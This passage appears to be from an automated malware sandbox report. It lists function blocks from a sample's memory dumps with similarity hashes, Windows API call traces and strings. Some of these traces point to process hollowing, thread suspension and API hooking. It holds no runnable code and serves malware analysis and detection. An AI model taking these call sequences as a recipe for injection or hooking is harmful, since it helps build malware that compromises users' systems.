  • Instruction Fuzzy Hash: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
APIs
  • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
  • wsprintfA.USER32 ref: 001CA775
  • RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
  • RegCloseKey.ADVAPI32(?), ref: 001CA7B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 108
  • API ID: CreateEventGetCurrentProcessIdGetLastErrorGetVersionOpenProcess
  • String ID:
  • API String ID: 2618137798-0
  • Opcode ID: 1fac3af1d3adb9373cb89c72372644e4dde4d88d2c69072dbd9dfbcd659d169c
  • Instruction ID: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
  • Opcode Fuzzy Hash: 97D05E300CD904CB900F7861444435C5E49FD873C289C3A45F84020D0EEBC4E2E03F99
  • Instruction Fuzzy Hash: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001C138B,?), ref: 001D81EE
  • GetVersion.KERNEL32 ref: 001D81FD
  • GetCurrentProcessId.KERNEL32 ref: 001D8214
  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001D8231
  • GetLastError.KERNEL32 ref: 001D8250
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: HeapFreeRtlAllocateHeapwsprintf
  • String ID: | "%s" | %u
  • API String ID: 2081543798-1108170107
  • Opcode ID: ae5a1f8a578234636b2fd743cdac99d3783860d35e2b0785ba9b52f3117a28dd
  • Instruction ID: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
  • Opcode Fuzzy Hash: 67E07DB409184355B037ACD69025B7EC3427D810CCC8C7A7AEA023520E6E03306727CD
  • Instruction Fuzzy Hash: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: CreateDirectoryGetTempFileNameGetTickCount
  • String ID: \Low
  • API String ID: 1806217356-4112222293
  • Opcode ID: 7a122810f4ba2df995a7e36e2785305a4afbcd989035409fc777345f7c9fec3f
  • Instruction ID: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
  • Opcode Fuzzy Hash: 49D0C2B9A24C468A8D56A268450A7718F61A251BD7BCC6034D7059B882E709B9CA1F12
  • Instruction Fuzzy Hash: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D7543
  • GetTickCount.KERNEL32(00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D754E
  • GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 001D755A
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeapmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 1636659435-3194369251
  • Opcode ID: a76e7bf81e614bf17f8f08eebcaf72a4e27078f9184a1b73ad63f98f5b0f8fb9
  • Instruction ID: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
  • Opcode Fuzzy Hash: 8AD0CD20050C91CEC927315268357A5E945BF82187C4D9173DA40342670F123161699F
  • Instruction Fuzzy Hash: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,?,00000002,?,00000016,00000000,00000000,00000004,?,?,20000013,00000000), ref: 001DEC80
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32 ref: 001DEC9A
  • memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
  • HeapFree.KERNEL32(00000000,?), ref: 001CA727
Strings
  • Access-Control-Allow-Origin:, xrefs: 001CA6B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrlen
  • String ID: EMPTY
  • API String ID: 1247231264-2677276532
  • Opcode ID: 2051cc3ec5f54dabcc304b4f0cec6452e119b3d666e1d12c395dfd06a3d839d2
  • Instruction ID: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
  • Opcode Fuzzy Hash: 8DD02B3086545F8FC0275440A4383E9D84477050D9D5D1535E4402A0485B0732811FA9
  • Instruction Fuzzy Hash: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
  • lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 70
  • API ID: GetModuleHandleGetTickCountwsprintf
  • String ID: {%08X-%04X-%04X-%04X-%08X%04X}
  • API String ID: 1324421646-3263720277
  • Opcode ID: d940d29fd7f5330e7f547d121f366808a2e82348162453c5dafed4dbd97d3afc
  • Instruction ID: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
  • Opcode Fuzzy Hash: 0FD05E78198713E62323F4540205D39B124A4A25E348E73A5C81072598BB96B74A6B33
  • Instruction Fuzzy Hash: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
APIs
Strings
  • {%08X-%04X-%04X-%04X-%08X%04X}, xrefs: 001CE3C7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: HeapFreelstrlenmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 3630223450-3194369251
  • Opcode ID: 6d2db76437dee989d9fadb858985fbdf1fd5b378b7da2dc10109644ce662e43c
  • Instruction ID: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
  • Opcode Fuzzy Hash: 65311E325646C0A6DC2560A24462B54E88037129E6ECC5319E366796F70F42E34FFF1E
  • Instruction Fuzzy Hash: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
APIs
  • memcpy.NTDLL(?,001ECCF4,0000001A,00000000,?,00000000,001CCA48,?,00000000), ref: 001CC4DA
  • lstrlen.KERNEL32(00000008,00000000), ref: 001CC6E5
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CC25A: WaitForSingleObject.KERNEL32(000001F4), ref: 001CC2E0
  • HeapFree.KERNEL32(00000000,00000008,?), ref: 001CC693
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001CA6B0: RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001CA6B0: memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
    • Part of subcall function 001CA6B0: HeapFree.KERNEL32(00000000,?), ref: 001CA727
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
    • Part of subcall function 001C7FA5: memmove.NTDLL(00000000,00000000,00000000,?,00000000,001CAA69,001EC504,00000000,00000000,-00000039,?,?,001CABDF,?,00000000,?), ref: 001C7FEB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 92
  • API ID: FreeLibraryGetLastErrorlstrlenmbstowcs
  • String ID:
  • API String ID: 3965213930-0
  • Opcode ID: 33e50c761254206a7693bc56ddd8fe5740e00c9b2afd6d060e954be887c38ac1
  • Instruction ID: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
  • Opcode Fuzzy Hash: 8011594A088E90A7C53360400993BD5E156E791DD6D8E73B36AE424ADA8E41B34F6F03
  • Instruction Fuzzy Hash: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
APIs
    • Part of subcall function 001DF422: RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
    • Part of subcall function 001DF422: LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
    • Part of subcall function 001DF422: GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4BC
    • Part of subcall function 001DF422: FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001DF422: RegCloseKey.ADVAPI32(?), ref: 001DF4EE
  • lstrlen.KERNEL32(00000001,00000008,00000000), ref: 001DF618
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001DF636
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DF68B
  • FreeLibrary.KERNEL32(?,?,00000001), ref: 001DF6F3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 52d5ac88bbbf53c9cfbe25b5062edfbbaef7bf8270021e4a65f9659b5eb139f2
  • Instruction ID: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
  • Opcode Fuzzy Hash: 97014507296660C3D102A815855973AF583E742EBAE28E600DA81B008A4E9539F0EB6D
  • Instruction Fuzzy Hash: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
APIs
  • memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC097: memset.NTDLL ref: 001DC0D3
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: memcpy$GetSystemTimeAsFileTimelstrlen
  • String ID:
  • API String ID: 1931430322-0
  • Opcode ID: 693e72703b4a898abaf84b83207713b059777c08181f4929022bd8422aa13c29
  • Instruction ID: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
  • Opcode Fuzzy Hash: DAF08162280C9557ED332454000FF6E1756F662081E8D7733CEF3683A759115254F797
  • Instruction Fuzzy Hash: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001DE961), ref: 001DE3C0
  • lstrlen.KERNEL32(?), ref: 001DE3F0
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,?,?), ref: 001DE45F
  • memcpy.NTDLL(00000008,001E53C8,00000002,00000000,?,?), ref: 001DE474
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpymemset
  • String ID: chun
  • API String ID: 1623351483-3058818181
  • Opcode ID: b1cb9c83363d1f5f3482edc3613e0487e364ca7cf0dd43c793242431dbb67071
  • Instruction ID: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
  • Opcode Fuzzy Hash: 1BF081A5584A42C8F8FA3044C1B657556D27F82A9884C7A07C947203BB65C3B7D73F5D
  • Instruction Fuzzy Hash: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
APIs
  • memset.NTDLL ref: 001C7ED0
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
  • memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 207
  • API ID: GetLastErrorRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 3795092134-0
  • Opcode ID: 9c0483735e420b961606bb44f790258f0624431ad703bd6a52c8d6e915669058
  • Instruction ID: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
  • Opcode Fuzzy Hash: 3DF0AC400B9F91EBE45376440492F59A247BB01FB6E0EE721A9F211BC23F02625D9B1A
  • Instruction Fuzzy Hash: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
APIs
  • memset.NTDLL ref: 001D894F
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 001D8A42
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
  • memcpy.NTDLL(00000218,001E3E62,00000100,?,00010003,00083097,?,00000318,00000008), ref: 001D89CA
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001D8A24
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: GetLastError$RtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 3867703424-0
  • Opcode ID: fbdca7628cbe78cbc3b7d70cd058564445f685c77becf59faaf0370b25f97c7a
  • Instruction ID: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
  • Opcode Fuzzy Hash: 66E0E56338CAC1DB174A70D01AF6A96EC88F8D529254F2F20D418597071E81717F9A1B
  • Instruction Fuzzy Hash: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE104
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE11F
  • GetLastError.KERNEL32 ref: 001CE18D
    • Part of subcall function 001CDFE8: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001CE066
    • Part of subcall function 001CDFE8: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CE096
    • Part of subcall function 001CDFE8: memcpy.NTDLL(00000000,?,?), ref: 001CE0A7
  • GetLastError.KERNEL32 ref: 001CE19C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleOpenFileMappinglstrlenmemset
  • String ID:
  • API String ID: 686913658-0
  • Opcode ID: c2b4898062c1065ed0612e860c2cb0de06a6071118fdcd99c43ffcca291be294
  • Instruction ID: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
  • Opcode Fuzzy Hash: 0DF05C570219CDC7C4221114D800B11B5257B76C6ACEC9399FCA014D948E0A31A9BE0B
  • Instruction Fuzzy Hash: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
APIs
  • memset.NTDLL ref: 001C7284
    • Part of subcall function 001CBCD2: CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
    • Part of subcall function 001CBCD2: GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
    • Part of subcall function 001CBCD2: WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
    • Part of subcall function 001CBCD2: WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
  • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
  • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
  • CloseHandle.KERNEL32(?), ref: 001C7331
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 114
  • API ID: CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 3243309207-0
  • Opcode ID: daf6b00ae99c80d22f011dd47a129de89f1e33b4c2e36c8a2c33b66dba590708
  • Instruction ID: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
  • Opcode Fuzzy Hash: 45E02B814FCFC2D7AB5F2404059175270E6EF60E05C9D9B647520BA5665E3031257E9B
  • Instruction Fuzzy Hash: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,01B37494,00000000), ref: 01B33F6C
  • CloseHandle.KERNEL32(01B37494), ref: 01B33FEC
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 01B33FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 01B33FD7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 40
  • API ID: HeapFree$GetLastErrorRtlAllocateHeap
  • String ID:
  • API String ID: 692199287-0
  • Opcode ID: 4904fb8dbc2e953e77b98dbe9d3f55cb9d56c3531de4b3fdb52f823351afa574
  • Instruction ID: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
  • Opcode Fuzzy Hash: C2E0D8351D48C3E3812714E9D064BFEE500AB805C0E0D26ABBD847D20C9D127076E7C6
  • Instruction Fuzzy Hash: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
  • GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
  • HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 21
  • API ID: GetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 2843147199-2746444292
  • Opcode ID: 7d6f6f6309830c53eb87eb1248ac9b1ade3661ad178ea1527cba377d544f1ce2
  • Instruction ID: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
  • Opcode Fuzzy Hash: BDE068961F0CC4E2C49844CC6273B01E3200FA055ACDDE72036A8340637A20F51DCBA4
  • Instruction Fuzzy Hash: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
APIs
  • memset.NTDLL ref: 01B313B5
    • Part of subcall function 01B33340: GetProcAddress.KERNEL32(01B3866B,01B345D9,00000000,01B3618C,00000000,00000000,?,?,?,01B311A6,?,01B3618C,00000000,00000000), ref: 01B33354
  • GetLastError.KERNEL32(00000001), ref: 01B31422
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B31433
    • Part of subcall function 01B322D2: memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
    • Part of subcall function 01B322D2: WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
    • Part of subcall function 01B322D2: SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B322D2: GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?), ref: 01B32418
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: RegCloseKeyRegOpenKeylstrcmpilstrlen
  • String ID:
  • API String ID: 352456400-0
  • Opcode ID: 9381e8ebef87ae03ea2b4a3254f2d425f4b44f3dd01b09b1a235e089a5947b32
  • Instruction ID: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
  • Opcode Fuzzy Hash: 71E02B73858AC38A80833424A43A7B7D714AF102D794D2717E9849E1057F9631AA7B66
  • Instruction Fuzzy Hash: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
  • lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
  • lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 87
  • API ID: GetModuleHandleStrChrlstrcpylstrlen
  • String ID:
  • API String ID: 2222289486-0
  • Opcode ID: 864a615e2bbc61195937544d5275c128a98c955975673d031bfe47106b2bd609
  • Instruction ID: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
  • Opcode Fuzzy Hash: B6E0AB26038D8847CEF7D444210378A8600BB91189C9EE720EC51605830F0032D3E90B
  • Instruction Fuzzy Hash: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
APIs
  • lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
  • StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
